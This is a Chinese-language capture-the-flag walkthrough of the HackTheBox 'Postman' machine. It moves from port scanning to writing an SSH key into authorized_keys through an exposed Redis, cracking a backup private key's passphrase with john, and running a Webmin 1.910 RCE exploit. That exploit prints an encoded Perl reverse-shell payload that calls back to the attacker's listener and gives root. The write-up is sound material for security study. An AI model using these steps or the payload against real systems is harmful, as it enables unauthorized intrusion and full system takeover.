美文网首页
【HTB】Postman(redis 4.0.9,webmin

【HTB】Postman(redis 4.0.9,webmin

作者: 天线锅仔 | 来源:发表于2021-12-25 16:51 被阅读0次

    免责声明

    本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

    服务探测

    查看开通端口

    ┌──(root💀kali)-[~/htb/Postman]
    └─# nmap -p- 10.10.10.160 --open
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:54 EST
    Nmap scan report for 10.10.10.160
    Host is up (0.31s latency).
    Not shown: 64665 closed ports, 866 filtered ports
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT      STATE SERVICE
    22/tcp    open  ssh
    80/tcp    open  http
    6379/tcp  open  redis
    10000/tcp open  snet-sensor-mgmt
    
    Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds
    
    

    查看端口详细信息

    ┌──(root💀kali)-[~/htb/Postman]
    └─# nmap -sV -T4 -A -O 10.10.10.160 -p 22,80,6379,10000
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:57 EST
    Nmap scan report for 10.10.10.160
    Host is up (0.26s latency).
    
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
    |   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
    |_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
    80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: The Cyber Geek's Personal Website
    6379/tcp  open  redis   Redis key-value store 4.0.9
    10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE (using port 443/tcp)
    HOP RTT       ADDRESS
    1   251.42 ms 10.10.14.1
    2   253.03 ms 10.10.10.160
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 52.24 seconds
    
    

    先把靶机域名写进host文件

    echo "10.10.10.160 Postman" >> /etc/hosts

    可以看到开了ssh服务,一个80端口的http服务,6379是redis服务,10000端口是webmin服务

    webmin存在一个rce漏洞,但是需要登录账号和密码。

    ┌──(root💀kali)-[~/htb/Postman]
    └─# searchsploit webmin 1.910                                                                     130 ⨯
    ---------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                        |  Path
    ---------------------------------------------------------------------- ---------------------------------
    Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit | linux/remote/46984.rb
    Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)         | linux/webapps/47330.rb
    ---------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    
    

    redis 4.0.9

    redis这个版本好像存在一个rce,但是试了几个exp都报错

    -ERR unknown command 'system.exec'

    搜索了一圈,在这个帖子下看到一个答案

    The redis instance doesn't have MODULE command which is odd. If this is a CTF it might be intentional that the box creator removed it.

    所以可能是被创建者人为移除了这个漏洞

    hacktricks找到了一个通过修改redis的ssh配置文件,从而无密码登录靶机的方法,步骤如下:

    1. cli登录redis

    redis-cli -h 10.10.10.160

    1. 使用get dir获取redis的安装目录
    ┌──(root💀kali)-[~/htb/Postman]
    └─# redis-cli -h 10.10.10.160
    10.10.10.160:6379> config get dir
    1) "dir"
    2) "/var/lib/redis"
    

    现在我们知道redis安装在靶机的/var/lib/redis目录,这一步主要是用于写ssh文件。

    1. kali端,把本地id_rsa.pub重定向到key.txt,需要注意要空两行

    (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt

    1. 把攻击机公钥写进靶机的.ssh

    cat key.txt | redis-cli -h 10.10.10.160 -x set ssh_key

    1. 再次登录靶机redis,获取ssh_key值,成功显示,表示已经写入
    ┌──(root💀kali)-[~/htb/Postman]
    └─# redis-cli -h 10.10.10.160
    10.10.10.160:6379> GET ssh_key
    "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX....
    
    1. 设置redis的dir目录

    CONFIG SET dir /var/lib/redis/.ssh

    1. 设置dbfilename为authorized_keys

    dbfilename authorized_keys

    1. 保存

    save

    1. 退出redis终端,ssh登录
    ┌──(root💀kali)-[~/htb/Postman]
    └─# ssh redis@10.10.10.160
    The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
    RSA key fingerprint is SHA256:FJdNat9qUrffCNDMV/0qF8efJdwa8NXW+iQ7NXuf/uk.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.10.160' (RSA) to the list of known hosts.
    Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
    redis@Postman:~$ id
    uid=107(redis) gid=114(redis) groups=114(redis)
    redis@Postman:~$ whoami
    redis
    
    

    user.txt在用户matt下,redis账号没有权限

    提权到matt

    传linpeas,发现一个id_rsa.bak文件

    ╔══════════╣ Backup files (limited 100)
    -rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak  
    

    转成john可以识别的样式

    ┌──(root💀kali)-[~/htb/Postman]
    └─# /usr/share/john/ssh2john.py id_rsa >crask
    

    john破解

    ┌──(root💀kali)-[~/htb/Postman]
    └─# john --wordlist=/usr/share/wordlists/rockyou.txt crask
    Using default input encoding: UTF-8
    Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
    Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
    Cost 2 (iteration count) is 2 for all loaded hashes
    Will run 4 OpenMP threads
    Note: This format may emit false positives, so it will keep trying even after
    finding a possible candidate.
    Press 'q' or Ctrl-C to abort, almost any other key for status
    computer2008     (id_rsa)
    Warning: Only 2 candidates left, minimum 4 needed for performance.
    1g 0:00:00:07 DONE (2021-12-25 01:04) 0.1290g/s 1850Kp/s 1850Kc/s 1850KC/sa6_123..*7¡Vamos!
    Session completed
    
    

    然而并不能直接登录

    ┌──(root💀kali)-[~/htb/Postman]
    └─# ssh -i id_rsa matt@10.10.10.160                                                                                                                                                                                                                                                                                    130 ⨯
    Enter passphrase for key 'id_rsa': 
    Connection closed by 10.10.10.160 port 22
    
    

    然后尝试用密码computer2008直接切换到Matt,成功了

    redis@Postman:/opt$ su Matt
    Password: 
    Matt@Postman:/opt$ id
    uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
    Matt@Postman:/opt$ whoami
    Matt
    
    

    提权

    webmin 1.910

    webmin是一个基于web界面的类unix管理平台,由于需要管理系统的诸多类容,所以常常都是以root权限运行。
    前面我们已经知道啊这个版本的webmin存在一个rce,如今我们又有了登录账号信息Matt:computer2008,现在我们可以利用这个rce提权

    使用github上这个RCE

    先在kali开启一个监听

    nc -lnvp 4242

    执行攻击:

    ┌──(root💀kali)-[~/htb/Postman]
    └─# python3 exploit_poc.py --ip_address=10.10.10.160 --port=10000 --lhost=10.10.14.3 --lport=4242 --user=Matt --pass=computer2008
    
    Webmin 1.9101- 'Package updates' RCE
    
    [+] Generating Payload...
    [+] Reverse Payload Generated : u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4zOjQyNDIiKTtTVERJTi0%2BZmRvcGVuKCRjLHIpOyR%2BLT5mZG9wZW4oJGMsdyk7d2hpbGUoPD4pe2lmKCRfPX4gLyguKikvKXtzeXN0ZW0gJDE7fX07Jw%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22&ok_top=Update+Selected+Packages
    [+] Attempting to login to Webmin
    [+] Login Successful
    [+] Attempting to Exploit
    
    
    

    拿到反弹shell

    ┌──(root💀kali)-[~/htb/Postman]
    └─# nc -lnvp 4242                    
    listening on [any] 4242 ...
    connect to [10.10.14.3] from (UNKNOWN) [10.10.10.160] 36814
    id
    uid=0(root) gid=0(root) groups=0(root)
    whoami
    root
    
    

    已经成功提权到root

    相关文章

      网友评论

          本文标题:【HTB】Postman(redis 4.0.9,webmin

          本文链接:https://www.haomeiwen.com/subject/alwdqrtx.html